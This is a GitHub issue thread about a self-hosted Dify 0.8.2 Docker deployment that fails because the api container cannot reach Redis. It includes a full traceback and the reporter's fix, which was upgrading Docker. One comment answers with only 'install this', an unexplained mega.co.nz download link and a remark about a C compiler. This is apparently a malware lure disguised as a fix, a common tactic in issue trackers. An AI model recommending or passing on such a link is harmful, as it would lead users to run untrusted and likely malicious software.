### ISSUE TITLE
docker-compose up -d，docker-api-1 logs report error。

### ISSUE THREAD

**Issue by llllllllu** [langgenius/dify#8561]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.8.2

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

after exec docker-compose up -d。open serveIP on browser，report 502，then look up docker-api log，displayed as Actual Behavior

### ✔️ Expected Behavior

![QQ20240919-184433](https://github.com/user-attachments/assets/817b6b50-8761-4a2d-b8f3-628d9e18c791)

### ❌ Actual Behavior

 docker logs docker-api-1 
Running migrations
None of PyTorch, TensorFlow >= 2.0, or Flax have been found. Models won't be available and only tokenizers, configuration and file/data utilities can be used.
sagemaker.config INFO - Not applying SDK defaults from location: /etc/xdg/sagemaker/config.yaml
sagemaker.config INFO - Not applying SDK defaults from location: /root/.config/sagemaker/config.yaml
INFO:matplotlib.font_manager:generated new fontManager
Preparing database migration...
Traceback (most recent call last):
  File "/app/api/.venv/lib/python3.10/site-packages/redis/connection.py", line 277, in connect
    sock = self.retry.call_with_retry(
  File "/app/api/.venv/lib/python3.10/site-packages/redis/retry.py", line 62, in call_with_retry
    return do()
  File "/app/api/.venv/lib/python3.10/site-packages/redis/connection.py", line 278, in <lambda>
    lambda: self._connect(), lambda error: self.disconnect(error)
  File "/app/api/.venv/lib/python3.10/site-packages/redis/connection.py", line 639, in _connect
    raise err
  File "/app/api/.venv/lib/python3.10/site-packages/redis/connection.py", line 627, in _connect
    sock.connect(socket_address)
OSError: [Errno 113] No route to host

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/app/api/.venv/bin/flask", line 8, in <module>
    sys.exit(main())
  File "/app/api/.venv/lib/python3.10/site-packages/flask/cli.py", line 1105, in main
    cli.main()
  File "/app/api/.venv/lib/python3.10/site-packages/click/core.py", line 1078, in main
    rv = self.invoke(ctx)
  File "/app/api/.venv/lib/python3.10/site-packages/click/core.py", line 1688, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/app/api/.venv/lib/python3.10/site-packages/click/core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/app/api/.venv/lib/python3.10/site-packages/click/core.py", line 783, in invoke
    return __callback(*args, **kwargs)
  File "/app/api/commands.py", line 607, in upgrade_db
    if lock.acquire(blocking=False):
  File "/app/api/.venv/lib/python3.10/site-packages/redis/lock.py", line 210, in acquire
    if self.do_acquire(token):
  File "/app/api/.venv/lib/python3.10/site-packages/redis/lock.py", line 226, in do_acquire
    if self.redis.set(self.name, token, nx=True, px=timeout):
  File "/app/api/.venv/lib/python3.10/site-packages/redis/commands/core.py", line 2333, in set
    return self.execute_command("SET", *pieces, **options)
  File "/app/api/.venv/lib/python3.10/site-packages/redis/client.py", line 545, in execute_command
    conn = self.connection or pool.get_connection(command_name, **options)
  File "/app/api/.venv/lib/python3.10/site-packages/redis/connection.py", line 1074, in get_connection
    connection.connect()
  File "/app/api/.venv/lib/python3.10/site-packages/redis/connection.py", line 283, in connect
    raise ConnectionError(self._error_message(e))
redis.exceptions.ConnectionError: Error 113 connecting to redis:6379. No route to host.
Running migrations
None of PyTorch, TensorFlow >= 2.0, or Flax have been found. Models won't be available and only tokenizers, configuration and file/data utilities can be used.

**Comment by nhatlaso1** [comment]
install this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw

you may need to install the c compiler

**Comment by llllllllu** [comment]
My Docker version is 18. It`s worked,when I update version to 26.0.0.
